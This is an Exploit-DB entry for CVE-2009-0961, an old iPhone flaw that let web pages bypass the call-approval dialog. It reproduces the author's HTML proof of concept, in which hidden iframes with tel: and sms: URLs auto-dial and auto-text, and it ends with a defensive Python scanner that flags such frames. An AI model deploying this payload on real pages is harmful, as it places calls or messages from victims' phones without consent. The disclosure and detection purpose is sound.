- 18 Dec 2022
- EDB-ID
- 33044
- EDB Verified
- Passed
- Author
- COLLIN MULLINER
- Vulnerability type
- REMOTE
- Platform
- HARDWARE
- CVE
- CVE-2009-0961
- Publication date
- 2009-05-17
HTML:
source: https://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title>
</head>
<body>
<iframe src="sms:+12345" WIDTH=50 HEIGHT=10></iframe>
<iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe>
<!-- second iframe is to attack quick users who manage to close the first call-dialog //-->
<iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe>
</body>
</html>
- Source
- www.exploit-db.com
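For defenders filtering HTML mail or proxied web content, the pattern in the demo above (a frame whose `src` is a `tel:` or `sms:` URL, loaded without any click) can be flagged statically. The following is an added example, not part of the original advisory or the author's code; `scan_html`, `Finding` and `AUTOLOAD_ATTRS` are hypothetical names, and the sample markup is constructed.

```python
from html.parser import HTMLParser
from typing import NamedTuple

# URI schemes that hand off to the dialer or SMS app (the two used on this page).
HANDOFF_SCHEMES = {"tel", "sms"}
# Elements whose URL is loaded with the page, without a user click (assumed list).
AUTOLOAD_ATTRS = {"iframe": "src", "frame": "src"}


class Finding(NamedTuple):
    line: int
    tag: str
    scheme: str
    url: str


class AutoDialFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling us.
        wanted = AUTOLOAD_ATTRS.get(tag)
        if wanted is None:
            return  # e.g. <a href="tel:..."> needs a click, so it is not flagged
        # Browsers honour the first occurrence of a duplicated attribute.
        value = next((v for k, v in attrs if k == wanted), None) or ""
        url = value.strip()
        scheme, sep, _ = url.partition(":")
        if sep and scheme.lower() in HANDOFF_SCHEMES:
            self.findings.append(Finding(self.getpos()[0], tag, scheme.lower(), url))


def scan_html(html):
    """Return one Finding per frame that loads a tel:/sms: URL on its own."""
    finder = AutoDialFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: a benign click-to-call link beside auto-loading frames.
SAMPLE = """<html><body>
<a href="tel:+12345">Call us</a>
<iframe src="sms:+12345" width=50 height=10></iframe>
<iframe src=" TEL:+12345" width=50 height=10></iframe>
<iframe src="https://example.com/map"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE):
        print(f"line {f.line}: <{f.tag}> auto-loads {f.scheme}: URL {f.url!r}")
```
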